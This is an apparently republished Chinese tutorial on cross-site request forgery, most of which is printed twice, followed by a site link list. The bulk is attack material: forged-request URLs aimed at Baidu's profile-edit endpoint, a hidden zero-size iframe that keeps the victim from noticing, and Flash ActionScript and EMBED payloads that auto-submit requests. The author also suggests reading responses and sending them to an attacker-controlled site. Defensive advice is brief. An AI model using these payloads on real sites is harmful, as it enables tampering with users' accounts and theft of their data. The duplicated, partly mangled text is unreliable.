CSRF—攻击与防御
网络安全 2021-07-03 09:19www.168986.cn网络安全知识
0x01 什么是CSRF攻击
CSRF是Cross Site Request Fery的缩写(也缩写为XSRF),直译过来就是跨站请求伪造的意思,也就是在用户会话下对某个CGI做一些GET/POST的事情——这些事情用户未必知道和愿意做,你可以把它想做HTTP会话劫持。
网站是通过cookie来识别用户的,当用户成功进行身份验证之后浏览器就会得到一个标识其身份的cookie,只要不关闭浏览器或者退出登录,以后访问这个网站会带上这个cookie。如果这期间浏览器被人控制着请求了这个网站的url,可能就会执行一些用户不想做的功能(比如修改个人资料)。因为这个不是用户真正想发出的请求,这就是所谓的请求伪造;呵呵,因为这些请求也是可以从第三方网站提交的,所以前缀跨站二字。
举个简单的例子,某个bbs可以贴图,在贴图的URL中写入退出登陆的链接,当用户阅读这个帖子之后就会logout了,因为用户以自己的身份访问了退出登陆链接,在用户看来是帖子里面有一张有问题的“图片”,而不是想要退出,但程序就会认为是用户要求退出登陆而销毁其会话。这就是传说中的CSRF攻击了。
不要小看CSRF哦,记得以前L-Blog就存在一个CSRF漏洞(当时还不知道这个概念:p),它添加管理员是这样的一个链接http: //localhost/L-Blog/admincp.asp?action=member&type=editmem&memID=2& memType=SupAdmin,我们只要构造好ID想办法让管理员访问到这个URL就可以了;还有Google那个CSRF漏洞[1],将导致邮件泄漏;,不要以为只有XSS才能爆发蠕虫,只要条件合适,CSRF同样是有可能的。
0x02 威胁来自哪里
贴图只是GET的方式,很多时候我们需要伪造POST的请求。一个办法是利用跨站,目标站点可能不存在跨站,这个时候我们可以从第三方网站发动攻击。
比如我要攻击一个存在问题的blog,那就先去目标blog留言,留下一个网址,诱其主人点击过来(这个就要看你的忽悠本事咯:p),然后构造个HTML表单提交些数据过去。
多窗口浏览器就帮了一点忙。
多窗口浏览器(firefox、遨游、MyIE……)便捷的也带来了一些问题,因为多窗口浏览器新开的窗口是具有当前所有会话的。即我用IE登陆了我的Blog,然后我想看新闻了,又运行一个IE进程,这个时候两个IE窗口的会话是彼此独立的,从看新闻的IE发送请求到Blog不会有我登录的 cookie;多窗口浏览器永远都只有一个进程,各窗口的会话是通用的,即看新闻的窗口发请求到Blog是会带上我在blog登录的cookie。
想一想,当我们用鼠标在Blog/BBS/WebMail点击别人留下的链接的时候,说不定一场精心准备的CSRF攻击正等着我们。
0x03 发起CSRF攻击
从第三方站点利用POST发动CSRF攻击就是利用Javascript自动提交表单到目标CGI。每次都去写表单不是很方便,辅助进行的工具有XSS POST Forwarder[2]和CSRF Redirector[3],这里我也写了相应的ASP版本[4]。使用的时候只要把提交的url和参数传给它,它就会自动POST到目标。
比如我要提交一些数据到.0x54./a.asphttp: //.0x54./lake2/xss_post_forwarder.asp?lake2=http://.0x54./a.asp& a=123&b=321&c=%(这里要自己考虑URL编码哦)
不过实际攻击的时候你得动动脑子如何才能把用户诱骗到我们的网页来。
0x04 一个实例
因为CSRF不如XSS那么引人注目,所以现在找一个存在CSRF的Web应用程序还是很容易的。这次我们的目标是百度,just for test。
随便你用什么办法,让一个已登陆百度的用户访问一下这个URLhttp: //.0x54./lake2/xss_post_forwarder.asp?lake2=http://passport.baidu./umitbas&u_jump_url=&sex=1&email=CSRF@baidu.&sdv=&zodiac=0&birth_year=0&birth_month=0&birth_day=0&blood=0&bs0=请选择&bs1=请选择&bs2=无&txt_bs=&birth_site=;;&b=rs0=请选择&rs1=请选择&rs2=无&txt_rs=&reside_site=;;
呵呵,然后看看那人个人资料是不是被修改了。这里有点郁闷,当那人访问URL后浏览器会返回到资料修改成功的页面,我们就被发现了。那么,有没有办法不让浏览器刷新呢?
有。
一个办法是用iframe,构造这样的HTML代码<iframe width=0 height=0 src="http://.0x54./lake2/xss_post_forwarder.asp?lake2=http://passport.baidu./umitbas&u_jump_url=&sex=1&email=CSRF@baidu.&sdv=&zodiac=0&birth_year=0&birth_month=0&birth_day=0&blood=0&bs0=请选择&bs1=请选择&bs2=无&txt_bs=&birth_site=;;&b=rs0=请选择&rs1=请选择&rs2=无&txt_rs=&reside_site=;;"></iframe>
还有一个办法就是用flash了。
0x05 CSRF With Flash
flash是可以提交数据到任意URL的,打开盗版的 Adobe flash CS 3 Professional,新建一个 flash文件(ActionScript 3.0) ,在默认的图层上点右键选动作,然后把以下代码添加进去
import flash..URLRequest;
import flash.system.Security;
var url = new URLRequest("http://.0x54./lake2");
var lake = new URLVariables();
lake = "a=lake2";
url.method = "POST";
url.data = lake;
sendToURL(url);
s();
导出为swf文件,访问之,抓包看看效果咯http://.0x54./lake2/flash/test1.html
每次都去写as和编译swf很麻烦的,根据CSRF Redirector的思路我写了一个类似的flash程序[5],再拿百度来试试效果,访问带如下HTML的网页<EMBED src="http://.0x54./lake2/flash/flash_hacking.swf?f=1&t=http://passport.baidu./umitbas& d=u_jump_url=&sex=1&email=CSRF@baidu.&sdv=&zodiac=0% 26birth_year=0&birth_month=0&birth_day=0&blood=0&bs0=%C7% 25EB%D1%A1%D4%F1&bs1=%C7%EB%D1%A1%D4%F1&bs2=% 25CE%DE&txt_bs=&birth_site=%3B%3B&b%3Drs0=%C7%EB% 25D1%A1%D4%F1&rs1=%C7%EB%D1%A1%D4%F1&rs2=%CE% 25DE&txt_rs=&reside_site=%3B%3B"></EMBED>(还是要注意URL二次编码)
这里不要只局限于发请求,其实flash是可以得到返回内容的,要是返回内容有敏感信息的话,就可以读出来发送到我们控制的Web去。,这个得看目标站点是否让flash跨域取内容了。
0x06 检测CSRF
检测CSRF漏洞都是体力活了,先抓取一个正常请求的数据包,然后去掉referer字段再重新提交,如果还是有效那基本上就存在问题了。参数可能含有不能预测的参数(比如userid什么的),这个时候就看这个不可预测的参数能不能通过其他手段比如flash拿到,如果能,呵呵,则还是存在问题。还有就是试着改post为get,因为有些程序是不区分get/post的。
应用程序的功能和返回形式都各不相同,所以想自动化测试CSRF漏洞还是有点困难的,OWASP上面有一个叫做CSRFTester的工具不妨拿来一试[6]
0x07 防御CSRF
在Web应用程序侧防御CSRF漏洞,一般都是利用referer、token或者验证码,Nexus的文章[7]已经写的很全面了;superhei也有提出bypass的思路[8],请参考他们的文章。
还有一个思路是在客户端防御,貌似可以做成一个类似HTTP Watch的软件,挂在浏览器上拦截或者过滤跨域的cookie。
CSRF是Cross Site Request Fery的缩写(也缩写为XSRF),直译过来就是跨站请求伪造的意思,也就是在用户会话下对某个CGI做一些GET/POST的事情——这些事情用户未必知道和愿意做,你可以把它想做HTTP会话劫持。
网站是通过cookie来识别用户的,当用户成功进行身份验证之后浏览器就会得到一个标识其身份的cookie,只要不关闭浏览器或者退出登录,以后访问这个网站会带上这个cookie。如果这期间浏览器被人控制着请求了这个网站的url,可能就会执行一些用户不想做的功能(比如修改个人资料)。因为这个不是用户真正想发出的请求,这就是所谓的请求伪造;呵呵,因为这些请求也是可以从第三方网站提交的,所以前缀跨站二字。
举个简单的例子,某个bbs可以贴图,在贴图的URL中写入退出登陆的链接,当用户阅读这个帖子之后就会logout了,因为用户以自己的身份访问了退出登陆链接,在用户看来是帖子里面有一张有问题的“图片”,而不是想要退出,但程序就会认为是用户要求退出登陆而销毁其会话。这就是传说中的CSRF攻击了。
不要小看CSRF哦,记得以前L-Blog就存在一个CSRF漏洞(当时还不知道这个概念:p),它添加管理员是这样的一个链接http: //localhost/L-Blog/admincp.asp?action=member&type=editmem&memID=2& memType=SupAdmin,我们只要构造好ID想办法让管理员访问到这个URL就可以了;还有Google那个CSRF漏洞[1],将导致邮件泄漏;,不要以为只有XSS才能爆发蠕虫,只要条件合适,CSRF同样是有可能的。
0x02 威胁来自哪里
贴图只是GET的方式,很多时候我们需要伪造POST的请求。一个办法是利用跨站,目标站点可能不存在跨站,这个时候我们可以从第三方网站发动攻击。
比如我要攻击一个存在问题的blog,那就先去目标blog留言,留下一个网址,诱其主人点击过来(这个就要看你的忽悠本事咯:p),然后构造个HTML表单提交些数据过去。
多窗口浏览器就帮了一点忙。
多窗口浏览器(firefox、遨游、MyIE……)便捷的也带来了一些问题,因为多窗口浏览器新开的窗口是具有当前所有会话的。即我用IE登陆了我的Blog,然后我想看新闻了,又运行一个IE进程,这个时候两个IE窗口的会话是彼此独立的,从看新闻的IE发送请求到Blog不会有我登录的 cookie;多窗口浏览器永远都只有一个进程,各窗口的会话是通用的,即看新闻的窗口发请求到Blog是会带上我在blog登录的cookie。
想一想,当我们用鼠标在Blog/BBS/WebMail点击别人留下的链接的时候,说不定一场精心准备的CSRF攻击正等着我们。
0x03 发起CSRF攻击
从第三方站点利用POST发动CSRF攻击就是利用Javascript自动提交表单到目标CGI。每次都去写表单不是很方便,辅助进行的工具有XSS POST Forwarder[2]和CSRF Redirector[3],这里我也写了相应的ASP版本[4]。使用的时候只要把提交的url和参数传给它,它就会自动POST到目标。
比如我要提交一些数据到.0x54./a.asphttp: //.0x54./lake2/xss_post_forwarder.asp?lake2=http://.0x54./a.asp& a=123&b=321&c=%(这里要自己考虑URL编码哦)
不过实际攻击的时候你得动动脑子如何才能把用户诱骗到我们的网页来。
0x04 一个实例
因为CSRF不如XSS那么引人注目,所以现在找一个存在CSRF的Web应用程序还是很容易的。这次我们的目标是百度,just for test。
随便你用什么办法,让一个已登陆百度的用户访问一下这个URLhttp: //.0x54./lake2/xss_post_forwarder.asp?lake2=http://passport.baidu./umitbas&u_jump_url=&sex=1&email=CSRF@baidu.&sdv=&zodiac=0&birth_year=0&birth_month=0&birth_day=0&blood=0&bs0=请选择&bs1=请选择&bs2=无&txt_bs=&birth_site=;;&b=rs0=请选择&rs1=请选择&rs2=无&txt_rs=&reside_site=;;
呵呵,然后看看那人个人资料是不是被修改了。这里有点郁闷,当那人访问URL后浏览器会返回到资料修改成功的页面,我们就被发现了。那么,有没有办法不让浏览器刷新呢?
有。
一个办法是用iframe,构造这样的HTML代码<iframe width=0 height=0 src="http://.0x54./lake2/xss_post_forwarder.asp?lake2=http://passport.baidu./umitbas&u_jump_url=&sex=1&email=CSRF@baidu.&sdv=&zodiac=0&birth_year=0&birth_month=0&birth_day=0&blood=0&bs0=请选择&bs1=请选择&bs2=无&txt_bs=&birth_site=;;&b=rs0=请选择&rs1=请选择&rs2=无&txt_rs=&reside_site=;;"></iframe>
还有一个办法就是用flash了。
0x05 CSRF With Flash
flash是可以提交数据到任意URL的,打开盗版的 Adobe flash CS 3 Professional,新建一个 flash文件(ActionScript 3.0) ,在默认的图层上点右键选动作,然后把以下代码添加进去
import flash..URLRequest;
import flash.system.Security;
var url = new URLRequest("http://.0x54./lake2");
var lake = new URLVariables();
lake = "a=lake2";
url.method = "POST";
url.data = lake;
sendToURL(url);
s();
导出为swf文件,访问之,抓包看看效果咯http://.0x54./lake2/flash/test1.html
每次都去写as和编译swf很麻烦的,根据CSRF Redirector的思路我写了一个类似的flash程序[5],再拿百度来试试效果,访问带如下HTML的网页<EMBED src="http://.0x54./lake2/flash/flash_hacking.swf?f=1&t=http://passport.baidu./umitbas& d=u_jump_url=&sex=1&email=CSRF@baidu.&sdv=&zodiac=0% 26birth_year=0&birth_month=0&birth_day=0&blood=0&bs0=%C7% 25EB%D1%A1%D4%F1&bs1=%C7%EB%D1%A1%D4%F1&bs2=% 25CE%DE&txt_bs=&birth_site=%3B%3B&b%3Drs0=%C7%EB% 25D1%A1%D4%F1&rs1=%C7%EB%D1%A1%D4%F1&rs2=%CE% 25DE&txt_rs=&reside_site=%3B%3B"></EMBED>(还是要注意URL二次编码)
这里不要只局限于发请求,其实flash是可以得到返回内容的,要是返回内容有敏感信息的话,就可以读出来发送到我们控制的Web去。,这个得看目标站点是否让flash跨域取内容了。
0x06 检测CSRF
检测CSRF漏洞都是体力活了,先抓取一个正常请求的数据包,然后去掉referer字段再重新提交,如果还是有效那基本上就存在问题了。参数可能含有不能预测的参数(比如userid什么的),这个时候就看这个不可预测的参数能不能通过其他手段比如flash拿到,如果能,呵呵,则还是存在问题。还有就是试着改post为get,因为有些程序是不区分get/post的。
应用程序的功能和返回形式都各不相同,所以想自动化测试CSRF漏洞还是有点困难的,OWASP上面有一个叫做CSRFTester的工具不妨拿来一试[6]
0x07 防御CSRF
在Web应用程序侧防御CSRF漏洞,一般都是利用referer、token或者验证码,Nexus的文章[7]已经写的很全面了;superhei也有提出bypass的思路[8],请参考他们的文章。
还有一个思路是在客户端防御,貌似可以做成一个类似HTTP Watch的软件,挂在浏览器上拦截或者过滤跨域的cookie。
上一篇:弹窗口的流氓软件核心代码
下一篇:黑客入侵网络的五十种方法
网络安全培训
- 网络安全常见漏洞类型 网络安全常见漏洞类型包
- 绿色上网顺口溜七言 绿色上网的宣传标语
- 网络安全等级保护测评 网络安全等级保护条例
- 如何加强网络安全 网络安全隐患有哪些
- 网络安全防护措施有哪些 网络安全等级保护等级
- 如何保障网络安全 如何做好网络安全保障工作
- 维护网络安全的措施有哪些 维护网络安全的主要
- 网络安全工程师好学吗 2024年网络安全工程师好学
- 网络安全注意事项简短 网络安全注意事项100字
- 网络安全面临的挑战 当前网络安全面临的新问题
- 网络安全培训哪个靠谱 网络安全培训找哪个
- 普及网络安全知识内容 普及网络安全教育
- 网络安全防范知识宣传内容 网络安全防范知识宣
- 如何做好网络安全工作 如何做好网络安全工作
- 网络安全常识的丰富内容 网络安全的相关知识
- 青少年网络安全教育片 青少年网络安全知识讲座